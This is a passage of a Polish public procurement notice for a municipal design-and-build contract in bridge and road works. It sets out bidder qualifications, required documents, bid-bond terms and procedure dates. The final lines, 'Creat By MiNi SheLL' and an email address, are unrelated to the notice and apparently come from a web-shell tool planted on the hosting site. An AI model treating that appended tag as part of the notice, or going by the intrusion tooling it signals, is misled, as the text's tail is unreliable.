której należało uzyskać pozwolenie na budowę lub zgłoszenie.<br/><br/>b) warunek dotyczący zdolności zawodowej zostanie spełniony jeżeli wykonawca wykaże, iż dysponuje osobami zdolnymi do wykonania zamówienia, tj.:<br/>- projektantem - jedna osobą posiadającą uprawnienia do projektowania w specjalności mostowej oraz przynależność do Okręgowej Izby Inżynierów Budownictwa zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane.<br/>- projektantem - jedna osobą posiadającą uprawnienia do projektowania w specjalności inżynieryjnej drogowej oraz przynależność do Okręgowej Izby Inżynierów Budownictwa zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane.<br/>- kierownikiem budowy - jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności mostowej lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa oraz przynależność do Okręgowej Izby Inżynierów Budownictwa zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane.<br/>- kierownikiem budowy - jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa oraz przynależność do Okręgowej Izby Inżynierów Budownictwa zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane.<br/>Zamawiający dopuszcza łączenie różnych funkcji dla poszczególnych osób przez jedną osobę, która spełnia łącznie warunki wymagane dla tych funkcji.<br/><br/>Zamawiający dopuszcza aby Wykonawca wykazał doświadczenie, o którym mowa w pkt 4a) w ramach jednego zrealizowanego zamówienia tj. w formie zaprojektuj i wybuduj. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">5)	Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej –załącznik nr 4 do SWZ;<br/>6)	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>7)	Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 p.z.p., wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne<br/>wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>8)	Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Wykaz robót budowlanych (załącznik nr 5 do SWZ) wraz z podaniem ich rodzaju, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane.<br/>2)	Wykaz opracowanych dokumentacji projektowych (załącznik nr 5 do SWZ) wraz z podaniem ich rodzaju, daty i podmiotów, na rzecz których prace te zostały wykonane, z załączeniem dowodów określających czy prace projektowe zostały wykonane należycie, w szczególności informacji o tym czy zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. <br/>3)	Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za projektowanie i kierowanie robotami budowlanymi wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 6 do SWZ).<br/>4)	Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępując do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie: 5 000,00 zł (słownie: pięć tysięcy złotych).<br/>2. Wadium musi obejmować pełen okres związania z ofertą, o którym mowa w Rozdziale XIX.<br/>3. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust.7 ustawy pzp.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego prowadzony przez<br/>Bank Spółdzielczy w Żywcu, nr rachunku: 81 8137 0009 0000 2538 2000 0030 z dopiskiem nazwy zadania lub numeru<br/>postępowania. Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu<br/>składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>5. Wadium wnoszone w gwarancjach lub poręczeniach należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego w formie określonej w art. 97 ust. 10 ustawy pzp podpisanego przez wystawcę dokumentu i powinno<br/>zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego) gwaranta/poręczyciela oraz wskazanie<br/>ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być gmina Lipowa.<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem;<br/>3) kwota gwarancji/poręczenia;<br/>4) termin ważności gwarancji/poręczenia;<br/>5) zobowiązania gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie<br/>zamawiającego, w sytuacjach określonych w art. 98 ust.6 ustawy pzp.<br/>6. W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymał wadium<br/>nieprzerwalnie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust.2 pkt.3 ustawy pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust1 pkt. 14 ustawy pzp.<br/>7. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust.1-5 ustawy pzp.<br/>8. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust.6 ustawy pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>2.	Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą stosowne pełnomocnictwo – zgodnie z rozdz. XX ust. 2 pkt. 1 e SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/> Uwaga: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy podmiotów składających wspólnie ofertę.<br/>3.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika).<br/>4.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie,<br/>o którym mowa w art. 125 ust 1 ustawy pzp (rozdziału XIII pkt 1 SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia (każdy z Wykonawców wspólnie składających ofertę nie może podlegać wykluczeniu z postępowania co oznacza, iż oświadczenie w tym zakresie musi złożyć każdy z Wykonawców składających ofertę wspólną; oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie).<br/>5.	Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców składających wspólną ofertę, który został upoważniony do wykonania tej czynności.<br/>6.	Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana, Zamawiający zażąda złożenia przed zawarciem umowy w sprawie zamówienia publicznego – kopii umowy regulujących współprace tych Wykonawców.<br/>7.	Wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarnie odpowiedzialność prawną za realizację zamówienia. Problematykę zobowiązań solidarnych w zakresie nie uregulowanym przez umowę między wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia regulują przepisy Kodeksu cywilnego.<br/>8.	Jeżeli Wykonawcy wspólnie ubiegają się o zamówienie składają Oświadczenie Wykonawców wspólnie ubiegających się o zamówienie- załącznik nr 11 do SWZ w zakresie określonym w tym załączniku. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. W załączniku nr 9 do SWZ zawarte są klauzule dotyczące możliwości i warunki zmiany umowy w sprawie zamówienia publicznego.<br/>2. Zmiana postanowień niniejszej umowy może nastąpić jedynie wtedy, gdy nie jest ona sprzeczna z ustawą Prawo zamówień publicznych.<br/>3. Zmiana umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia możliwa jest na warunkach określonych w art. 455 ustawy pzp.<br/>4. Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy pzp oraz wskazanym we Wzorze Umowy stanowiącym Załącznik nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy e-zamówienia: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wykluczy z postępowania Wykonawcę w przypadkach określonych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835 z późn. zm.), zwanej dalej „ustawą sankcyjną”. Szczegółowe regulacje w tym zakresie zostały zawarte w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com